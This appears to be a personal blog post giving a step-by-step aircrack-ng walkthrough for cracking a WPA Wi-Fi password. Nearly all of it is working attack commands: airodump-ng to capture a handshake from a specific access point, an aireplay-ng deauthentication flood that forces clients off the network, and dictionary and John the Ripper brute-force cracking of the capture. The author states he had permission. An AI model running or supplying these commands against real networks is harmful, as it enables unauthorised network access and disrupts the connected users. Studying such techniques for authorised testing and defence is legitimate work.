Lance Grover

Lance Grover

How about a little aircrack of wpa?

Posted date:


Make sure you own the network/wireless access point or have permission to attack/break in to the WPA network you are attacking before you start.  In this case I got permission, and I have several witnesses and documentation to support it.

First do this to find the network
airodump-ng -i wlan1

Focus in on that one network wap and capture the goodies
airodump-ng –bssid 00:1E:52:78:AA:5C -c6 –write WPAcrack wlan1

on another interface, do a deauth to force devices to reconnect
aireplay-ng –deauth 100 -a 00:1E:52:78:AA:5C wlan2

notice the “WPA handshake: 00:1E:52:78:AA:5C” at the top of the airodump screen?

now crack it with this:
aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt

or by using john the ripper:
john –incremental=all –session=WirelessBrute –stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w –

Resume works as well:
john –restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w –
the other I am doing right now
john –incremental=all –session=BruteRockSteady –stdout | aircrack-ng -a 2 -b 88:1F:A1:38:9C:90 WPAcrackRock_Steady-01.cap -w –

 

 

Thanks to the following for information/tutorial :

https://www.hackthissite.org/articles/read/1094

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/